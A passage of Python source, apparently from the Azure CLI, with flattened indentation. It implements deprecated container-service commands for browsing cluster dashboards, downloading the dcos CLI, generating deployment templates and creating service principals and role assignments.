from azure.cli.core._profile import Profile
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
AzureInternalError,
FileOperationError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ResourceNotFoundError,
ValidationError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.profiles import ResourceType
from azure.cli.core.util import in_cloud_console, sdk_no_wait
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_y_n
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
logger = get_logger(__name__)
# pylint: disable=unused-argument
def get_cmd_test_hook_data(filename):
hook_data = None
curr_dir = os.path.dirname(os.path.realpath(__file__))
test_hook_file_path = os.path.join(curr_dir, 'tests/latest/data', filename)
if os.path.exists(test_hook_file_path):
with open(test_hook_file_path, "r") as f:
hook_data = json.load(f)
return hook_data
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs browse / acs kubernetes browse / acs dcos browse / acs kubernetes get-credentials
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs browse
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(
cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs browse
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError(
'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes browse
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes browse
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(
name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(
_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos install-cli
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError(
'Connection error while attempting to download client ({})'.format(err))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(
windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
Deployment = cmd.get_models(
'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(
resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create / osa command
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import ApplicationCreateParameters, GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
from azure.graphrbac.models import KeyCredential, PasswordCredential
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
from azure.graphrbac.models import ServicePrincipalCreateParameters
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _add_role_assignment(cmd, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cmd.cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cmd, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except CLIError as ex:
logger.warning(str(ex))
except Exception as ex: # pylint: disable=broad-except
logger.error(str(ex))
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def create_role_assignment(cmd, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cmd,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _create_role_assignment(cmd, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import get_sdk
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = assignee
if resolve_assignee:
from azure.graphrbac.models import GraphErrorException
error_msg = "Failed to resolve service principal object ID: "
try:
object_id = _resolve_object_id(cmd.cli_ctx, assignee)
except GraphErrorException as ex:
if ex.response is not None:
error_code = getattr(ex.response, "status_code", None)
error_reason = getattr(ex.response, "reason", None)
internal_error = ""
if error_code:
internal_error += str(error_code)
if error_reason:
if internal_error:
internal_error += " - "
internal_error += str(error_reason)
if internal_error:
error_msg += "({}) ".format(internal_error)
error_msg += ex.message
# this should be UserFault or ServiceError, but it is meaningless to distinguish them here
raise CLIError(error_msg)
except Exception as ex: # pylint: disable=bare-except
raise CLIError(error_msg + str(ex))
assignment_name = uuid.uuid4()
custom_headers = None
RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
RoleAssignmentProperties = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentProperties', mod='models',
operation_group='role_assignments')
properties = RoleAssignmentProperties(role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, properties, custom_headers=custom_headers)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
